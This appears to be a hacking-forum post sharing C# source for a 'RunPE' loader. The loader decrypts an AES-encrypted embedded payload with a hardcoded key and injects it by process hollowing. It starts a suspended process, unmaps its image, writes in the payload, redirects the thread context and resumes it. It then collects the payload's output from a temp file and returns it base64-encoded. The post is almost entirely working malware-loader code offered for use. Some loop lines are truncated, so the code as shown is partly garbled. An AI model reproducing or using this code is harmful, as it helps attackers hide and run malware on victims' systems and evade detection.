13 Years of Service
24%
[c#] RunPE [n0ise]
Code:
>namespace ClassLibrary1
{
using System;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
public class Class1
{
private byte[] aesDecryptArray(byte[] data, string encryptionKey)
{
PasswordDeriveBytes bytes = new PasswordDeriveBytes(encryptionKey, Encoding.Default.GetBytes(encryptionKey));
MemoryStream stream = new MemoryStream();
Rijndael rijndael = Rijndael.Create();
rijndael.Key = bytes.GetBytes(0x20);
rijndael.IV = bytes.GetBytes(0x10);
CryptoStream stream2 = new CryptoStream(stream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
stream2.Write(data, 0, data.Length);
stream2.Close();
return stream.ToArray();
}
private string base64EncodeString(string text)
{
return Convert.ToBase64String(Encoding.Default.GetBytes(text));
}
private void execute(byte[] fBytes, string szTarget, string szParameters)
{
IMAGE_DOS_HEADER image_dos_header = new IMAGE_DOS_HEADER();
IMAGE_NT_HEADERS structure = new IMAGE_NT_HEADERS();
IMAGE_SECTION_HEADER image_section_header = new IMAGE_SECTION_HEADER();
STARTUPINFO startupinfo = new STARTUPINFO();
PROCESS_INFORMATION lpProcessInformation = new PROCESS_INFORMATION();
CONTEXT lpContext = new CONTEXT();
_CreateProcess delegateForFunctionPointer = (_CreateProcess) Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("kernel32.dll"), "CreateProcessA"), typeof(_CreateProcess));
_NtUnmapViewOfSection section = (_NtUnmapViewOfSection) Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("ntdll.dll"), "NtUnmapViewOfSection"), typeof(_NtUnmapViewOfSection));
_VirtualAllocEx ex = (_VirtualAllocEx) Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("kernel32.dll"), "VirtualAllocEx"), typeof(_VirtualAllocEx));
_WriteProcessMemory memory = (_WriteProcessMemory) Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("kernel32.dll"), "WriteProcessMemory"), typeof(_WriteProcessMemory));
_GetThreadContext context2 = (_GetThreadContext) Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("kernel32.dll"), "GetThreadContext"), typeof(_GetThreadContext));
_SetThreadContext context3 = (_SetThreadContext) Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("kernel32.dll"), "SetThreadContext"), typeof(_SetThreadContext));
_ResumeThread thread = (_ResumeThread) Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("kernel32.dll"), "ResumeThread"), typeof(_ResumeThread));
int num = 0;
startupinfo.cb = (uint) Marshal.SizeOf(startupinfo);
lpContext.ContextFlags = 0x10007;
GCHandle handle = GCHandle.Alloc(fBytes, GCHandleType.Pinned);
num = handle.AddrOfPinnedObject().ToInt32();
handle.Free();
image_dos_header = (IMAGE_DOS_HEADER) Marshal.PtrToStructure((IntPtr) num, typeof(IMAGE_DOS_HEADER));
structure = (IMAGE_NT_HEADERS) Marshal.PtrToStructure((IntPtr) (num + image_dos_header.e_lfanew), typeof(IMAGE_NT_HEADERS));
if ((structure.Signature == 0x4550) && (image_dos_header.e_magic == 0x5a4d))
{
delegateForFunctionPointer(szTarget, szParameters, IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref startupinfo, out lpProcessInformation);
section(lpProcessInformation.hProcess, (IntPtr) structure.OptionalHeader.ImageBase);
if (ex(lpProcessInformation.hProcess, (IntPtr) structure.OptionalHeader.ImageBase, structure.OptionalHeader.SizeOfImage, AllocationType.COMMIT | AllocationType.RESERVE, MemoryProtection.EXECUTE_READWRITE))
{
memory(lpProcessInformation.hProcess, (IntPtr) structure.OptionalHeader.ImageBase, fBytes, structure.OptionalHeader.SizeOfHeaders, null);
for (int i = 0; i {
image_section_header = (IMAGE_SECTION_HEADER) Marshal.PtrToStructure((IntPtr) (((num + image_dos_header.e_lfanew) + Marshal.SizeOf(structure)) + (Marshal.SizeOf(image_section_header) * i)), typeof(IMAGE_SECTION_HEADER));
byte[] lpBuffer = new byte[image_section_header.SizeOfRawData];
for (int j = 0; j {
lpBuffer[j] = fBytes[(int) ((IntPtr) (image_section_header.PointerToRawData + j))];
}
memory(lpProcessInformation.hProcess, (IntPtr) (structure.OptionalHeader.ImageBase + image_section_header.VirtualAddress), lpBuffer, image_section_header.SizeOfRawData, null);
}
context2(lpProcessInformation.hThread, ref lpContext);
byte[] bytes = BitConverter.GetBytes(structure.OptionalHeader.ImageBase);
memory(lpProcessInformation.hProcess, (IntPtr) (lpContext.Ebx + 8), bytes, (uint) bytes.Length, null);
lpContext.Eax = structure.OptionalHeader.ImageBase + structure.OptionalHeader.AddressOfEntryPoint;
context3(lpProcessInformation.hThread, ref lpContext);
thread(lpProcessInformation.hThread);
}
}
}
[DllImport("kernel32")]
private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
private string letsgo()
{
string str = string.Empty;
byte[] fBytes = this.aesDecryptArray(this.web, "showtime");
this.execute(fBytes, Application.ExecutablePath, " /scomma \"" + Environment.GetEnvironmentVariable("TEMP") + "\\temp\"");
if (File.Exists(Environment.GetEnvironmentVariable("TEMP") + @"\temp"))
{
str = File.ReadAllText(Environment.GetEnvironmentVariable("TEMP") + @"\temp");
File.Delete(Environment.GetEnvironmentVariable("TEMP") + @"\temp");
}
if (str.Length > 50)
{
return str;
}
return string.Empty;
}
[DllImport("kernel32")]
private static extern IntPtr LoadLibrary(string lpFileName);
public string whowantstofuckwithme()
{
string str = string.Empty;
try
{
str = this.base64EncodeString(this.letsgo());
}
catch
{
}
return str;
}
private delegate bool _CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, Class1.CreateProcessFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref Class1.STARTUPINFO lpStartupInfo, out Class1.PROCESS_INFORMATION lpProcessInformation);
private delegate bool _GetThreadContext(IntPtr hThread, ref Class1.CONTEXT lpContext);
private delegate bool _NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);
private delegate uint _ResumeThread(IntPtr hThread);
private delegate bool _SetThreadContext(IntPtr hThread, [in] ref Class1.CONTEXT lpContext);
private delegate bool _VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, Class1.AllocationType flAllocationType, Class1.MemoryProtection flProtect);
private delegate bool _WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, object lpNumberOfBytesWritten);
private enum AllocationType : uint
{
COMMIT = 0x1000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
RESERVE = 0x2000,
RESET = 0x80000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}
[structLayout(LayoutKind.Sequential)]
private struct CONTEXT
{
public uint ContextFlags;
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
public Class1.FLOATING_SAVE_AREA FloatSave;
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=0x200)]
public byte[] ExtendedRegisters;
}
private enum CONTEXT_FLAGS : uint
{
CONTEXT_ALL = 0x1003f,
CONTEXT_CONTROL = 0x10001,
CONTEXT_DEBUG_REGISTERS = 0x10010,
CONTEXT_EXTENDED_REGISTERS = 0x10020,
CONTEXT_FLOATING_POINT = 0x10008,
CONTEXT_FULL = 0x10007,
CONTEXT_i386 = 0x10000,
CONTEXT_i486 = 0x10000,
CONTEXT_INTEGER = 0x10002,
CONTEXT_SEGMENTS = 0x10004
}
private enum CreateProcessFlags : uint
{
CREATE_BREAKAWAY_FROM_JOB = 0x1000000,
CREATE_DEFAULT_ERROR_MODE = 0x4000000,
CREATE_NEW_CONSOLE = 0x10,
CREATE_NEW_PROCESS_GROUP = 0x200,
CREATE_NO_WINDOW = 0x8000000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x2000000,
CREATE_PROTECTED_PROCESS = 0x40000,
CREATE_SEPARATE_WOW_VDM = 0x800,
CREATE_SHARED_WOW_VDM = 0x1000,
CREATE_SUSPENDED = 4,
CREATE_UNICODE_ENVIRONMENT = 0x400,
DEBUG_ONLY_THIS_PROCESS = 2,
DEBUG_PROCESS = 1,
DETACHED_PROCESS = 8,
EXTENDED_STARTUPINFO_PRESENT = 0x80000,
INHERIT_PARENT_AFFINITY = 0x10000
}
[structLayout(LayoutKind.Sequential)]
private struct FLOATING_SAVE_AREA
{
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
}
[structLayout(LayoutKind.Sequential)]
private struct IMAGE_DATA_DIRECTORY
{
public uint VirtualAddress;
public uint Size;
}
[structLayout(LayoutKind.Sequential)]
private struct IMAGE_DOS_HEADER
{
public ushort e_magic;
public ushort e_cblp;
public ushort e_cp;
public ushort e_crlc;
public ushort e_cparhdr;
public ushort e_minalloc;
public ushort e_maxalloc;
public ushort e_ss;
public ushort e_sp;
public ushort e_csum;
public ushort e_ip;
public ushort e_cs;
public ushort e_lfarlc;
public ushort e_ovno;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=4)]
public ushort[] e_res1;
public ushort e_oemid;
public ushort e_oeminfo;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=10)]
public ushort[] e_res2;
public int e_lfanew;
}
[structLayout(LayoutKind.Sequential)]
private struct IMAGE_FILE_HEADER
{
public ushort Machine;
public ushort NumberOfSections;
public uint TimeDateStamp;
public uint PointerToSymbolTable;
public uint NumberOfSymbols;
public ushort SizeOfOptionalHeader;
public ushort Characteristics;
}
[structLayout(LayoutKind.Sequential)]
private struct IMAGE_NT_HEADERS
{
public uint Signature;
public Class1.IMAGE_FILE_HEADER FileHeader;
public Class1.IMAGE_OPTIONAL_HEADER32 OptionalHeader;
}
[structLayout(LayoutKind.Sequential)]
private struct IMAGE_OPTIONAL_HEADER32
{
public ushort Magic;
public byte MajorLinkerVersion;
public byte MinorLinkerVersion;
public uint SizeOfCode;
public uint SizeOfInitializedData;
public uint SizeOfUninitializedData;
public uint AddressOfEntryPoint;
public uint BaseOfCode;
public uint BaseOfData;
public uint ImageBase;
public uint SectionAlignment;
public uint FileAlignment;
public ushort MajorOperatingSystemVersion;
public ushort MinorOperatingSystemVersion;
public ushort MajorImageVersion;
public ushort MinorImageVersion;
public ushort MajorSubsystemVersion;
public ushort MinorSubsystemVersion;
public uint Win32VersionValue;
public uint SizeOfImage;
public uint SizeOfHeaders;
public uint CheckSum;
public ushort Subsystem;
public ushort DllCharacteristics;
public uint SizeOfStackReserve;
public uint SizeOfStackCommit;
public uint SizeOfHeapReserve;
public uint SizeOfHeapCommit;
public uint LoaderFlags;
public uint NumberOfRvaAndSizes;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=0x10)]
public Class1.IMAGE_DATA_DIRECTORY[] DataDirectory;
}
[structLayout(LayoutKind.Sequential)]
private struct IMAGE_SECTION_HEADER
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst=8)]
public byte[] Name;
public uint VirtualSize;
public uint VirtualAddress;
public uint SizeOfRawData;
public uint PointerToRawData;
public uint PointerToRelocations;
public uint PointerToLinenumbers;
public ushort NumberOfRelocations;
public ushort NumberOfLinenumbers;
public uint Characteristics;
}
private enum MemoryProtection : uint
{
EXECUTE = 0x10,
EXECUTE_READ = 0x20,
EXECUTE_READWRITE = 0x40,
EXECUTE_WRITECOPY = 0x80,
GUARD_Modifierflag = 0x100,
NOACCESS = 1,
NOCACHE_Modifierflag = 0x200,
READONLY = 2,
READWRITE = 4,
WRITECOMBINE_Modifierflag = 0x400,
WRITECOPY = 8
}
[structLayout(LayoutKind.Sequential)]
private struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
[structLayout(LayoutKind.Sequential)]
private struct SECURITY_ATTRIBUTES
{
public int length;
public IntPtr lpSecurityDescriptor;
public bool bInheritHandle;
}
[structLayout(LayoutKind.Sequential)]
private struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
}
}